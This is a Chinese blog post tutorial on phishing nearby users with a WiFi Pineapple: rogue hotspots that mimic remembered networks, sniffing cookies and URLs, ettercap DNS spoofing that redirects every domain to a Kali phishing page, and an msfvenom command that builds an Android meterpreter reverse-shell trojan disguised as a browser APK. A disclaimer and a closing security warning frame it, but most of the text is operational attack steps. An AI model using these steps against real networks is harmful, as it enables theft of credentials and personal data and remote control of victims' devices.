当前位置:首页 > 未分类 > 正文内容

使用 WifiPineApple 进行范围内 局域网钓鱼

admin7年前 (2018-12-01)未分类66

作者:W22

声明:

仅供参考,勿用于非法用途,否则后果自负,与作者无关。

准备工作:

  1. WifiPineApple,可以在极客之眼的论坛上买一个汉化的。

  1. 两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。

  1. 一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。

  1. KALI Linux 渗透操作系统。

在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:

在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。

下边说明实验的步骤:

0x01 连接 PineApple:

打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。

**

插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471

**

输入账号密码登陆(厂商提供默认口令)

我们看到以下的界面:

**

0x02 配置网络(重点):

在左侧的菜单栏中选择网络

**

在网络中我们可以看到当前网卡和 IP 地址获取的情况

**

我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)

最终达到这样的效果

**

0x03 进行一些嗅探和欺骗

PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。

当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?

**

0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页

  1. 启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)

**

  1. 配置 ip 地址,或者等待 dhcp 自动分配

  1. 可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start

  1. 将钓鱼页面放置 /var/www/html 目录下

  1. 接下来,我们启动 ettercap 来进行 dns 欺骗 :

配置 ettercap 文件:

Vim /etc/Ettercap/etter.dns

**

修改为所有的域名都指向 172.16.42.133 也就是 KALI 的地址

  1. 启动 ettercap  Ettercap -G

Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡

**

管理插件,并将 dns 欺骗功能启用

**

  1. 这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。

**

0x05 通过 msf 生成木马,远控手机或 PC。

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

放在钓鱼页面上,等待用户 “上钩”.

具体的用法可以参考这篇文章

附上我的几个成功的例子(在被允许的情况下)

**

当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

0x00 结语

引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。

本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下,欢迎指出错误,随时修正并学习。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=56

分享给朋友:

“使用 WifiPineApple 进行范围内 局域网钓鱼” 的相关文章

(原创)NOIP [全国青少年信息学奥林匹克联赛] 初赛之后的杂谈

(原创)NOIP [全国青少年信息学奥林匹克联赛] 初赛之后的杂谈

没人能比我更懂你。这次的 noip 初赛考的很砸,比数学还砸。深夜的情感就像熬过冬日的野草。我们都在寻找,寻找着一个能够和自己差不多的人,去对他倾诉自己的情感,去倾听他的情感。在一次一次的失败,一次又一次的成功后,留下的只是回忆;在一次次的交流中,一次次的倾听中,留下的是感情。就像我们总是在学习,却...

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

(原创)sqlmap 注入初级教程 [sqlmap][sqlmap 指令][sqlmap 怎么用]

一、熟悉 sqlmap 之路:核心注入场景与方法1. Sqlmap 之 Post 注入Post 注入适用于表单提交(如登录页、数据提交页)等场景,核心是通过抓取 Post 请求数据进行注入测试,以下为 4 种常用方法:方法一:基于请求文件(-r 参数)# 基础用法(请求文件与sqlmap同目录)sq...

(原创) 校园卡破解系列之内网渗透提权校园卡服务器 [内网渗透][服务器提权][渗透内网]

(原创) 校园卡破解系列之内网渗透提权校园卡服务器 [内网渗透][服务器提权][渗透内网]

一、渗透背景与环境准备1. 时间与环境渗透时间:上午大课间(仅十几分钟完成)操作设备:班级 XP 系统电脑(性能有限,需选择轻量工具)内网 IP:本地 IP 为172.18.33.38,扫描网段定为172.18.32.0-172.18.33.02. 工具选择优先工具:Kali 的 MSF 模块(可直...

(原创)Powershell And Metasploit (上)

(原创)Powershell And Metasploit (上)

00x01 #题外话作者: 墨 (X_Al3r)即刻安全:www.secist.com十三年社团:www.klmyssn.com一篇不知道该用什么名字的文章!00x02 #什么是 PowershellPowerShell 一般指 Windows Power ShellPowershell 是 Mic...

带你挖掘文件包含漏洞之代码审计 #4 实战五个案例

带你挖掘文件包含漏洞之代码审计 #4 实战五个案例

在 PHP 安全中,文件包含漏洞是危害严重的漏洞!本文不再讲解基础概念,直接进入实战环节。一、文件包含漏洞挖掘要点核心关键字:require()、require_once()、include()、include_once()(注意:函数名中括号与参数间存在空格,效果相同);本次实战对象:CMS 系统...

利用 Wireshark 任意获取 QQ 好友 IP 实施精准定位

利用 Wireshark 任意获取 QQ 好友 IP 实施精准定位

虽然网上已经有了很多获取 IP 的 QQ 插件,但是其原理大致都是相同的,但是插件的安全性而言就不敢恭维了,下面介绍如何利用 Wireshark 获取好友 IP。一、选择本机网卡并启动 Wireshark 监听打开 Wireshark 软件,在界面中选择需要监听的本机网卡(根据网络连接方式选择,如无...